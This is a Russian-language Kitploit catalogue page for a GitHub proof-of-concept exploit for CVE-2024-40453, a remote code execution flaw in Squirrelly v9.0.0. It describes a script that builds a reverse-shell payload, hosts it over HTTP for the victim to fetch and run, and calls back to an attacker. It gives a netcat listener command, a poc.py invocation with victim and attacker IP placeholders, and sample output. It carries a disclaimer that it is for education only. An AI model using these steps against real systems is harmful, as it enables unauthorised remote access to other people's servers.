Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-40453 — CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc | Kitploit
Инструменты/GitHubGitHub/bwithe/cve-2024-40453
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubbwithe/cve-2024-40453

CVE-2024-40453

CVE-2024-40453 - Squirrelly v9.0.0 RCE. Poc

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-40453 - Squirrelly v9.0.0 RCE

Отказ от ответственности:

Этот скрипт предназначен только для образовательных целей.

Не используйте его в незаконных целях.

Если вы это сделаете, это полностью ваша ответственность; я не несу ответственности за любое неправомерное использование.

Описание

Этот скрипт создает обратную оболочку с именем payload.sh в текущем каталоге.

Затем он запускает HTTP-сервер на порту 80, чтобы жертва могла скачать payload.sh.

На машине атакующего необходимо запустить прослушиватель (listener).

HTTP-сервер завершается через 3 секунды, чтобы жертва могла скачать и выполнить payload.sh.

ОБЪЯСНЕНИЕ ЭКСПЛОЙТА

На основе следующей информации был разработан этот POC. https://samuzora.com/posts/cve-2024-40453

ИСПОЛЬЗОВАНИЕ

Запустите свой прослушиватель

root@kitploit:~
rlwrap nc -nvlp 3000

Выполните полезную нагрузку

root@kitploit:~
# python3 poc.py -rhost <VICTIM_IP> -rport <VICTIM_PORT> -lhost <ATTACKER_IP> -lport <ATTACKER_LISTENER_PORT>

python3 poc.py -rhost 172.16.0.2 -rport 3000 -lhost 172.16.0.1 -lport 3000
[+] Payload created at payload.sh
[*] Hosting HTTP server on port 80
[*] Triggering remote execution
172.16.0.2 - - [13/Jun/2025 22:21:10] "GET /payload.sh HTTP/1.1" 200 -
[*] Shutting down HTTP server on port 80
[!] Check your listener!

Скачать инструмент